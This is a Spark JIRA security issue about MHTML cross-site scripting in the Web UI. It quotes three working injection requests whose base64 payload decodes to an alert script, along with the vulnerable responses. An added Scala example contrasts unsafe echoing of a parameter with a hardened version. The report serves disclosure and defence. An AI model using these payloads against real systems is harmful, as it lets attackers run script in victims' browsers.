spark-issues mailing list archives

From "Sean Owen (JIRA)" <j...@apache.org>
Subject [jira] [Updated] (SPARK-20393) Strengthen Spark to prevent XSS vulnerabilities
Date Fri, 26 May 2017 18:13:04 GMT

     [ https://issues.apache.org/jira/browse/SPARK-20393?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]

Sean Owen updated SPARK-20393:
------------------------------
    Fix Version/s:     (was: 2.3.0)
                   2.2.0

> Strengthen Spark to prevent XSS vulnerabilities
> -----------------------------------------------
>
>                 Key: SPARK-20393
>                 URL: https://issues.apache.org/jira/browse/SPARK-20393
>             Project: Spark
>          Issue Type: Bug
>          Components: Web UI
>    Affects Versions: 1.5.2, 2.0.2, 2.1.0
>            Reporter: Nicholas Marion
>            Assignee: Nicholas Marion
>            Priority: Minor
>              Labels: security
>             Fix For: 2.2.0
>
>
> Using IBM Security AppScan Standard, we discovered several easy-to-recreate MHTML cross-site
> scripting vulnerabilities in the Apache Spark Web GUI application, and these vulnerabilities
> were found to exist in Spark versions 1.5.2 and 2.0.2, the two levels we initially tested.
> A cross-site scripting attack is not really an attack on the Spark server as much as an attack
> on the end user, taking advantage of their trust in the Spark server to get them to click
> on a URL like the ones in the examples below. So whether the user could or could not change
> lots of stuff on the Spark server is not the key point. It is an attack on the user themselves.
> If they click the link the script could run in their browser and compromise their device.
> Once the browser is compromised it could submit Spark requests, but it also might not.
> https://blogs.technet.microsoft.com/srd/2011/01/28/more-information-about-the-mhtml-script-injection-vulnerability/
> {quote}
> Request: GET /app/?appId=Content-Type:%20multipart/related;%20boundary=_AppScan%0d%0a--
> _AppScan%0d%0aContent-Location:foo%0d%0aContent-Transfer-
> Encoding:base64%0d%0a%0d%0aPGh0bWw%2bPHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD48L2h0bWw%2b%0d%0a
> HTTP/1.1
> Excerpt from response: <div class="row-fluid">No running application with ID Content-Type: multipart/related;
> boundary=_AppScan
> --_AppScan
> Content-Location:foo
> Content-Transfer-Encoding:base64
> PGh0bWw+PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD48L2h0bWw+
> </div>
> Result: In the above payload the BASE64 data decodes as:
> <html><script>alert("XSS")</script></html>
> Request: GET /history/app-20161012202114-0038/stages/stage?id=1&attempt=0&task.sort=Content-
> Type:%20multipart/related;%20boundary=_AppScan%0d%0a--_AppScan%0d%0aContent-
> Location:foo%0d%0aContent-Transfer-
> Encoding:base64%0d%0a%0d%0aPGh0bWw%2bPHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD48L2h0bWw%2b%0d%0a&tas
> k.pageSize=100 HTTP/1.1
> Excerpt from response: Content-Type: multipart/related;
> boundary=_AppScan
> --_AppScan
> Content-Location:foo
> Content-Transfer-Encoding:base64
> PGh0bWw+PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD48L2h0bWw+
> Result: In the above payload the BASE64 data decodes as:
> <html><script>alert("XSS")</script></html>
> Request: GET /log?appId=app-20170113131903-0000&executorId=0&logType=Content-
> Type:%20multipart/related;%20boundary=_AppScan%0d%0a--_AppScan%0d%0aContent-
> Location:foo%0d%0aContent-Transfer-
> Encoding:base64%0d%0a%0d%0aPGh0bWw%2bPHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD48L2h0bWw%2b%0d%0a&byt
> eLength=0 HTTP/1.1
> Excerpt from response: ==== Bytes 0-0 of 0 of /u/nmarion/Spark_2.0.2.0/Spark-DK/work/app-20170113131903-0000/0/Content-
> Type: multipart/related; boundary=_AppScan
> --_AppScan
> Content-Location:foo
> Content-Transfer-Encoding:base64
> PGh0bWw+PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD48L2h0bWw+
> Result: In the above payload the BASE64 data decodes as:
> <html><script>alert("XSS")</script></html>
> {quote}
> security@apache was notified and recommended a PR.
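
The three requests in the report share one shape: a query parameter is echoed verbatim into the page body, and because the value carries CR/LF line breaks the echoed text forms a complete MIME structure that an MHTML-capable viewer can decode. The following is an added example written for this archive, not Spark's own code and not the PR the issue refers to. It shows the vulnerable rendering beside a hardened one for the `No running application with ID` message, and the names `ReflectedParamGuard`, `hasControlChars`, `escapeHtml`, `unsafeNotFound` and `safeNotFound` are all assumptions of the example; the `app-<14 digits>-<4 digits>` pattern is inferred from the IDs quoted in the report and is also an assumption.

```scala
// Added example for this report; not Spark's code and not the fix the issue refers to.
// Defender-side checks for a reflected query parameter: refuse to echo a value that
// carries control characters (the CR/LF pairs the MIME structure depends on) and
// HTML-escape whatever is echoed.
object ReflectedParamGuard {

  // Standalone-mode application IDs in the report look like app-20161012202114-0038.
  // This pattern is an assumption made for the example.
  private val AppIdPattern = """app-\d{14}-\d{4}""".r

  /** True if the value contains any ASCII control character (CR, LF, NUL, DEL, ...). */
  def hasControlChars(value: String): Boolean =
    value.exists(c => c < 0x20 || c == 0x7f)

  /** Escape the characters that are significant in HTML text nodes and attributes. */
  def escapeHtml(value: String): String = {
    val sb = new StringBuilder(value.length)
    value.foreach {
      case '&'  => sb.append("&amp;")
      case '<'  => sb.append("&lt;")
      case '>'  => sb.append("&gt;")
      case '"'  => sb.append("&quot;")
      case '\'' => sb.append("&#39;")
      case c    => sb.append(c)
    }
    sb.toString
  }

  /** Vulnerable rendering, matching the quoted response excerpt:
    * the raw parameter is concatenated straight into the markup. */
  def unsafeNotFound(appId: String): String =
    s"""<div class="row-fluid">No running application with ID $appId</div>"""

  /** Hardened rendering: a value that is not a plausible application ID (which
    * rules out anything containing CR/LF) is not echoed at all; a plausible
    * one is escaped before it is embedded. */
  def safeNotFound(appId: String): String = {
    val plausible = !hasControlChars(appId) && (appId match {
      case AppIdPattern() => true
      case _              => false
    })
    val shown = if (plausible) escapeHtml(appId) else "(invalid application ID)"
    s"""<div class="row-fluid">No running application with ID $shown</div>"""
  }

  def main(args: Array[String]): Unit = {
    // Constructed from the first request in the report: the appId value as the
    // server sees it after URL decoding (%0d%0a -> CR LF, %2b -> '+').
    val payload =
      "Content-Type: multipart/related; boundary=_AppScan\r\n--_AppScan\r\n" +
      "Content-Location:foo\r\nContent-Transfer-Encoding:base64\r\n\r\n" +
      "PGh0bWw+PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD48L2h0bWw+\r\n"

    val unsafe = unsafeNotFound(payload)
    val safe   = safeNotFound(payload)

    // The raw rendering reproduces the MIME boundary on its own line, as the report shows.
    assert(unsafe.contains("\r\n--_AppScan\r\n"))
    // The hardened rendering carries neither the boundary nor any line break.
    assert(!safe.contains("_AppScan") && !safe.contains("\r") && !safe.contains("\n"))
    // A well-formed ID is still echoed, so the page stays informative.
    assert(safeNotFound("app-20161012202114-0038").contains("app-20161012202114-0038"))

    println(unsafe)
    println(safe)
  }
}
```

One caveat the report makes worth stating: HTML escaping on its own does not change the base64 body, because base64 uses only letters, digits, `+`, `/` and `=`, and it does not remove the CR/LF pairs that give the echoed text its MIME shape. Escaping is the right defence against ordinary reflected markup, but for these payloads it is the refusal to echo a value containing control characters (or, equivalently, validating the parameter against the format the UI expects) that actually breaks the structure. Doing both costs nothing and covers both cases.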



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)

---------------------------------------------------------------------
To unsubscribe, e-mail: issues-unsubscribe@spark.apache.org
For additional commands, e-mail: issues-help@spark.apache.org

